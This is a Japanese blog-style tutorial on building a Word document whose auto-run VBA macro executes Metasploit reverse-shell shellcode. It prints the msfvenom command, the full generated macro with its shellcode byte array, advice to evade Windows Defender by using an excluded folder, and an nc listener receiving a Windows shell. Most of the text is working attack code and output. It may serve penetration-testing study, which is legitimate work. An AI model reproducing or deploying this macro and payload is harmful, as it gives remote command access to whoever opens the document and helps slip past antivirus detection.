Metasploitを使ってconnect-back shellを起動するWord文書を作ってみる

「電卓を起動するWord文書を作ってみる」では、簡単なVBAマクロを使って電卓を起動するWord文書を作成した。 VBAマクロではWin32 APIを呼ぶことができるため、任意のシェルコードを実行するマクロを書くことができる。 ここでは、Metasploit Frameworkを使ってconnect-back shellを起動するWord文書を作ってみる。


Kali Linux 2.0、Metasploit Framework 4.11.4

root@vm-kali64:~# uname -a
Linux vm-kali64 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux

root@vm-kali64:~# lsb_release -a
No LSB modules are available.
Distributor ID: Kali
Description:    Kali GNU/Linux 2.0
Release:        2.0
Codename:       sana

root@vm-kali64:~# msfconsole -v
Framework Version: 4.11.4-2015071403




root@vm-kali64:~# msfvenom --help
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>

    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
    -f, --format        <format>     Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder       <encoder>    The encoder to use
    -a, --arch          <arch>       The architecture to use
        --platform      <platform>   The platform of the payload
    -s, --space         <length>     The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
    -i, --iterations    <count>      The number of times to encode the payload
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include
    -x, --template      <path>       Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out           <path>       Save the payload
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message

root@vm-kali64:~# msfvenom -l

Framework Payloads (432 total)

    Name                                                Description
    ----                                                -----------
    aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                             Spawn a shell on an established connection
    windows/shell_reverse_tcp                           Connect back to attacker and spawn a command shell

root@vm-kali64:~# msfvenom -p windows/shell_reverse_tcp --payload-options
Options for payload/windows/shell_reverse_tcp:

       Name: Windows Command Shell, Reverse TCP Inline
     Module: payload/windows/shell_reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 324
       Rank: Normal

Provided by:
    vlad902 <>
    sf <>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

  Connect back to attacker and spawn a command shell

Advanced options for payload/windows/shell_reverse_tcp:


root@vm-kali64:~# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -f vba
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
#If Vba7 Then
        Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Jtr As Long, ByVal Xerhfbvq As Long, ByVal Bumokvf As LongPtr, Weldl As Long, ByVal Dxjc As Long, Xmf As Long) As LongPtr
        Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Gowjdhnce As Long, ByVal Hslz As Long, ByVal Cgxo As Long, ByVal Kftmzpye As Long) As LongPtr
        Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Ypdzzkr As LongPtr, ByRef Cnrpsnfhk As Any, ByVal Nrpb As Long) As LongPtr
        Private Declare Function CreateThread Lib "kernel32" (ByVal Jtr As Long, ByVal Xerhfbvq As Long, ByVal Bumokvf As Long, Weldl As Long, ByVal Dxjc As Long, Xmf As Long) As Long
        Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Gowjdhnce As Long, ByVal Hslz As Long, ByVal Cgxo As Long, ByVal Kftmzpye As Long) As Long
        Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Ypdzzkr As Long, ByRef Cnrpsnfhk As Any, ByVal Nrpb As Long) As Long

Sub Auto_Open()
        Dim Ewtoup As Long, Qkhfci As Variant, Kdhhfhp As Long
#If Vba7 Then
        Dim  Hhluw As LongPtr, Lgcpy As LongPtr
        Dim  Hhluw As Long, Lgcpy As Long
        Qkhfci = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1, _
199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81, _
139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193, _
207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36, _
1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36, _
91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,51,50,0, _
0,104,119,115,50,95,84,104,76,119,38,7,255,213,184,144,1,0,0,41, _
196,84,80,104,41,128,107,0,255,213,80,80,80,80,64,80,64,80,104,234, _
15,223,224,255,213,151,106,5,104,192,168,56,4,104,2,0,17,92,137,230, _
106,16,86,87,104,153,165,116,97,255,213,133,192,116,12,255,78,8,117,236, _
104,240,181,162,86,255,213,104,99,109,100,0,137,227,87,87,87,49,246,106, _
18,89,86,226,253,102,199,68,36,60,1,1,141,68,36,16,198,0,68,84, _
80,86,86,86,70,86,78,86,86,83,86,104,121,204,63,134,255,213,137,224, _
78,86,70,255,48,104,8,135,29,96,255,213,187,224,29,42,10,104,166,149, _
189,157,255,213,60,6,124,10,128,251,224,117,5,187,71,19,114,111,106,0, _

        Hhluw = VirtualAlloc(0, UBound(Qkhfci), &H1000, &H40)
        For Kdhhfhp = LBound(Qkhfci) To UBound(Qkhfci)
                Ewtoup = Qkhfci(Kdhhfhp)
                Lgcpy = RtlMoveMemory(Hhluw + Kdhhfhp, Ewtoup, 1)
        Next Kdhhfhp
        Lgcpy = CreateThread(0, 0, Hhluw, 0, 0, 0)
End Sub
Sub AutoOpen()
End Sub
Sub Workbook_Open()
End Sub

上の結果のうち、#If Vba7 Then以降が出力されたマクロとなる。 このマクロは、文書が開かれたタイミングで動作する。 具体的には、VirtualAlloc関数とRtlMoveMemory関数でメモリ上にシェルコードを配置し、CreateThread関数でこれを新たなスレッドで実行する。 ここで、デフォルトのEXITFUNC=processではシェルコードの最後にWordのプロセス自体を終了してしまうため、生成時にEXITFUNC=threadを指定していることに注意する。


「電卓を起動するWord文書を作ってみる」と同様にして、上のマクロを含むWord文書を作成する。 なお、このファイルはWindows DefenderでTrojanDownloader:O97M/Donoff.gen!Aとして検知されるため、Windows Defenderの除外フォルダの中に作成する必要がある。


root@vm-kali64:~# nc -v -l -p 4444
listening on [any] 4444 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 58116
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.